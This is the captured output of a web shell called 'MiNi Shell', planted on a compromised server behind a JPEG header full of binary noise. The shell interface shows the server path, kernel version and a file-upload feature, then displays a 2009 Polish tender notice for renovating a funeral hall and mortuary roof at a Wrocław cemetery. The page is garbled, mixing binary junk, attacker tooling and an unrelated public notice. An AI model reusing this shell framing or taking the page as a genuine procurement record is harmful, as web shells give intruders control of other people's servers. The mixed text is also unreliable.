JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/103391-N-2009.html

<p class="kh_header"><b>Wrocław: TT-28-17/2009 - Roboty budowlane w zakresie remontu wnętrza domu przedpogrzebowego oraz dachu nad halą przechowywania zwłok, miszczącym się na terenie Cmentarza Komunalnego Oddział Osobowice we Wrocławiu</b><br>
<b>Numer ogłoszenia: 103391 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Cmentarzy Komunalnych , pl. Strzelecki 19/21, 50-224 Wrocław, woj. dolnośląskie, tel. (0-71) 328 70 20, faks (0-71) 328 70 18.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zck.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> TT-28-17/2009 - Roboty budowlane w zakresie remontu wnętrza domu przedpogrzebowego oraz dachu nad halą przechowywania zwłok, miszczącym się na terenie Cmentarza Komunalnego Oddział Osobowice we Wrocławiu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem postępowania są roboty budowlane na terenie Cmentarza Komunalnego Oddział Osobowice przy ul. Osobowickiej 47 w zakresie:
1)	zadanie nr 1 - remontu wnętrza domu przedpogrzebowego;
2)	zadanie nr 2 - remontu dachu nad halą przechowywania zwłok.
2.	Specyfikacja robót dla zadania nr 1:
1)	roboty rozbiórkowe:
a)	zabezpieczenie terenu budowy;
b)	demontaż wyposażenia sanitarnego;
c)	demontaż stolarki;
d)	rozebranie posadzek i podkładów betonowych;
e)	rozebranie ścian;
2)	roboty budowlano - wykończeniowe:
a)	podkłady betonowe pod posadzki;
b)	izolacje podposadzkowe;
c)	posadzki z płyt granitowych;
d)	posadzki z kamieni sztucznych;
e)	uzupełnienie tynków ścian;
f)	przygotowanie powierzchni pionowych;
g)	montaż okładzin ścian i słupów;
h)	montaż ścianek działowych z płyt G-K;
i)	licowanie ścianek płytkami z kamieni sztucznych;
j)	montaż sufitów podwieszonych modułowych;
k)	malowanie ścian i sufitów;
l)	wymiana stolarki okiennej i drzwiowej;
m)	wymiana stolarki okiennej sali głównej z zamontowaniem witraży z demontażu;
n)	wymiana podokienników wewnętrznych i zewnętrznych;
o)	wywóz gruzu i rekultywacja terenów zielonych wokół kaplicy.
3)	roboty elektryczne - etap I:
a)	wymiana tablicy rozdzielczej;
b)	wymiana WLZ;
c)	montaż oświetlenia;
d)	wymiana osprzętu elektrycznego;
e)	montaż przewodów instalacji wewnętrznej;
4)	roboty elektryczne - etap II
a)	montaż przewodów elektrycznych;
b)	wymiana osprzętu elektrycznego;
c)	wymiana oświetlenia;
d)	wymiana instalacji nagłaśniającej;
5)	roboty instalacji sanitarnych:
a)	wymiana instalacji wody;
b)	montaż podgrzewaczy wody;
c)	izolacje rurociągów;
d)	wymiana instalacji kanalizacyjnej;
e)	wymiana i montaż ceramiki sanitarnej;
f)	wykonanie wentylacji w sanitariatach;
3.	Specyfikacja robót dla zadania nr 2:
a)	rozebranie obróbek blacharskich;
b)	rozebranie pokrycia z papy;
c)	rozebranie pokrycia szklanego świetlika;
d)	wymiana części deskowania;
e)	wymiana części konstrukcji drewnianej;
f)	montaż obróbek blacharskich z blachy tytan-cynk;
g)	pokrycie papą 2x termozgrzewalną klasy minimum ZDUNBIT PF i WF;
h)	pokrycie świetlika szkłem zbrojonym.
Szczegółowy zakres przedmiotu zamówienia określają przedmiary robót stanowiące załącznik nr 1 do niniejszej siwz. 
4.	Roboty będące przedmiotem zamówienia w zakresie:
1)	zadania nr 1 - remontu wnętrza domu przedpogrzebowego należy realizować
na podstawie projektu budowlano-wykonawczego opracowanego przez Biuro Projektów Paweł Kalinowski oraz załączonych przedmiarów robót stanowiących załącznik nr 1 do siwz (poz. 1 ÷ 4);
2)	zadania nr 2 - remontu dachu nad halą przechowywania zwłok należy realizować
na podstawie załączonego przedmiaru robót stanowiącego załącznik nr 1 do siwz (poz. 5)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.11.00.00-1, 45.45.30.00-7, 45.45.00.00-6, 45.31.23.10-3, 45.31.10.00-0, 45.31.57.00-5, 45.23.21.50-8, 45.23.24.11-6, 45.33.12.10-1, 45.33.00.00-9, 45.31.50.00-8, 45.26.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 126.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium na kwotę w wysokości: 8 000,00 zł (słownie: osiem tysięcy 00/100 złotych)<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	Zgodnie z art. 22 ust. 1 ustawy, o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
5)	a w szczególności spełniają następujące warunki:
a)	wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie minimum 2 prace podobne do objętych przedmiotem zamówienia. Za prace podobne Zamawiający uzna wykonanie prac remontowych wnętrza budynków o łącznej wartości nie mniejszej niż 800 000,00 zł;
b)	dysponują:
-	kierownikiem robót posiadającym uprawnienia budowlane w specjalności konstrukcyjno - budowlanej bez ograniczeń i przynależącym do Okręgowej Izby Inżynierów Budownictwa lub jako właściciel zakładu sam spełnia
te warunki,
-	osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej
w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz przynależącą do Okręgowej Izby Inżynierów Budownictwa lub jako właściciel zakładu sam spełnia te warunki,
-	osobą posiadającą uprawnienia budowlane w specjalności instalacyjnej
w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych oraz przynależącą do Okręgowej Izby Inżynierów Budownictwa lub jako właściciel zakładu sam spełnia te warunki.
c)	posiadają środki finansowe lub zdolność kredytową na kwotę minimum 150 000,00 zł;
d)	posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 50 000,00 zł.
2.	Ocena spełnienia warunków wymaganych od Wykonawców zostanie dokonana według formuły spełnia - nie spełnia na podstawie złożonych dokumentów i oświadczeń.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1)	oświadczenie z art. 22 ust. 1 ustawy;
2)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie
do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione
nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
Odpis (zaświadczenie) musi zawierać aktualny wykaz osób uprawnionych
do reprezentowania Wykonawcy. Wykonawcy, którzy złożyli wnioski do Krajowego Rejestru Sądowego w zakresie podmiotów uprawnionych do ich reprezentowania
lub przedmiotu działalności, winni złożyć potwierdzoną kserokopię takiego wniosku.
3)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne,
lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie
lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert;
4)	wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie wg załącznika nr 4
do siwz;
5)	wykaz osób (a w szczególności dotyczy to kierownika budowy oraz osób odpowiedzialnych za realizację poszczególnych branż (budowlanej, elektrycznej
i wod.-kan.)), które będą uczestniczyć w wykonywaniu zamówienia, wraz
z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności wg załącznika nr 5 do siwz;
6)	uprawnienia budowlane ww. osób w zakresie zgodnym z przedmiotem zamówienia;
7)	aktualne zaświadczenia z właściwej izby samorządowej o przynależności do Izby osób pełniących samodzielne funkcje w budownictwie;
8)	informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną nie wcześniej
niż 3 miesiące przed upływem terminu składania ofert;
9)	polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 80</li>
<li>2 - Termin remontu sali ceremonialnej - 20</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zck.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego pl. Strzelecki 19/21, Wrocław, pok. 103.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.07.2009 godzina 10:00, miejsce: w siedzibie Zamawiającego pl. Strzelecki 19/21, Wrocław, pok. 214 (sekretariatt).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com